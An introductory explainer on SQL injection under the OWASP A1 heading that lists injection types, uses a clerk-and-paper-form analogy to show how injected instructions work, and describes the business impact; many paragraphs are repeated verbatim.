OWASP A1-INJECTION
SQL INJECTION
SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists or private customer details.
Fig1.1: SQL injection
Type of SQL injection
Error Based SQL injection
Union Based SQL injection
Blind SQL injection
Boolean Based Blind SQLi
Time-Based Blind SQLi
Error Based SQL injection
Union Based SQL injection
Blind SQL injection
Boolean Based Blind SQLi
Time-Based Blind SQLi
SQL Injection scenario
Imagine a big company that keeps all the records in paper form in a big room full of filing cabinets. In order to retrieve or make changes to files, someone will fill a simple fill-in-the-blanks form and then that form will be sent to a clerk who follows the instructions on the form.
Imagine a big company that keeps all the records in paper form in a big room full of filing cabinets. In order to retrieve or make changes to files, someone will fill a simple fill-in-the-blanks form and then that form will be sent to a clerk who follows the instructions on the form.
For example:
Retrieve the billing records from start date _ _ _ to end date _ _ _ where the customer is _ _ _
Retrieve the billing records from start date _ _ _ to end date _ _ _ where the customer is _ _ _
Normally this would become something like this:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Billy Joe Bob
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Billy Joe Bob
But in the hands of an unscrupulous person, maybe this form could be used for other purposes.
For example:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also retrieve the credit card numbers for all customers
For example:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also retrieve the credit card numbers for all customers
By pretending that their name also includes other commands they can hijack the fill in the form, and if the clerk has not been trained to handle these sorts of things then maybe they will simply execute the instructions without thinking about it, and hand over all of the credit card information to a user.
Or, alternately:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also add $100,000 to Robert Mensas’ account balance
Which has similarly dangerous potential
SQL injection Architecture View
Or, alternately:
Retrieve the billing records from start date 01/01/2011 to end date 12/31/2011 where the customer is Robert Mensas and also add $100,000 to Robert Mensas’ account balance
Which has similarly dangerous potential
SQL injection Architecture View
Fig1.2: SQL injection Architecture View
Impact of SQL injection
The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
When calculating the potential cost of an SQLI, it’s important to consider the loss of customer trust should personal information such as phone numbers, addresses, and credit card details be stolen.
While this vector can be used to attack any SQL database, websites are the most frequent targets.
The impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.
When calculating the potential cost of an SQLI, it’s important to consider the loss of customer trust should personal information such as phone numbers, addresses, and credit card details be stolen.
While this vector can be used to attack any SQL database, websites are the most frequent targets.